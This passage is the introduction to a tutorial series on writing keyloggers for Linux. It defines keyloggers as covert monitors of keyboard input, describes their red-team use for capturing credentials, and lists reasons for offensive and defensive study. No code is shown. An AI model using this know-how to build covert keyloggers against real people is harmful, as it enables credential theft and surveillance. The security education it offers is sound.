In this first part of our Complete Guide to Keylogging in Linux, we will explore the basics of keylogging and its importance in the realm of Linux security, and dive deeper into keylogging in userspace, demonstrating how a keylogger can be written for Linux, by reading events directly from a keyboard device.
What Is a Keylogger?
A keylogger is a computer program designed to monitor keyboard inputs, generally in a covert manner to ensure that person being monitored is unaware of the activity. These programs generally monitor lower level keyboard events (e.g. key up and key down); and can run anywhere from kernel space to userspace depending upon design.
Keylogging & Security
Such programs are generally used in security audit excercises (commonly known as “red team”). Red team people use various attack tools to compromise target system, infiltrate the infrastructure, and capture precious data to find and expose various gaps in security monitoring of the entire target organization. Keyloggers are used to record account credentials, network credentials etc. which are then used for further infiltration of the infrastructure.
Why Is Studying a Keylogger Important?
For offensive security or red team:
You understand multiple ways to implement a keylogger You understand various places where a keylogger can run (userspace, kernel, hypervisor etc.)
For defensive security or blue team:
You understand common places where a keylogger can hide. You understand common APIs and methods that should be monitored to detect keyloggers (based on behaviour) Keyboard and Linux